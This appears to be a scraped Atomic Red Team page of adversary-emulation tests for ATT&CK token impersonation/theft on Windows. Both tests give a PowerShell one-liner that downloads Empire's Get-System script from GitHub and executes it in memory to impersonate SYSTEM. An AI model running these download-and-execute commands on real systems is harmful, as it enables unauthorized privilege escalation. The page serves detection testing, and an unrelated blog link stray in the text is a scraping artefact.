Try it using Invoke-Atomic

Access Token Manipulation: Token Impersonation/Theft

Description from ATT&CK

Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a logged on user's security context, or with <code>SetThreadToken</code> to assign the impersonated token to a thread.

An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Named pipe client impersonation

Uses PowerShell and Empire's GetSystem module. The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).

Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

Supported Platforms: windows

auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'); Get-System -Technique NamedPipe -Verbose

Atomic Test #2 -
1
SeDebugPrivilege
token duplication

Uses PowerShell and Empire's GetSystem module. The script uses

1
SeDebugPrivilege
to obtain, duplicate and impersonate the token of a another process. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).

Supported Platforms: windows

auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'); Get-System -Technique Token -Verbose

source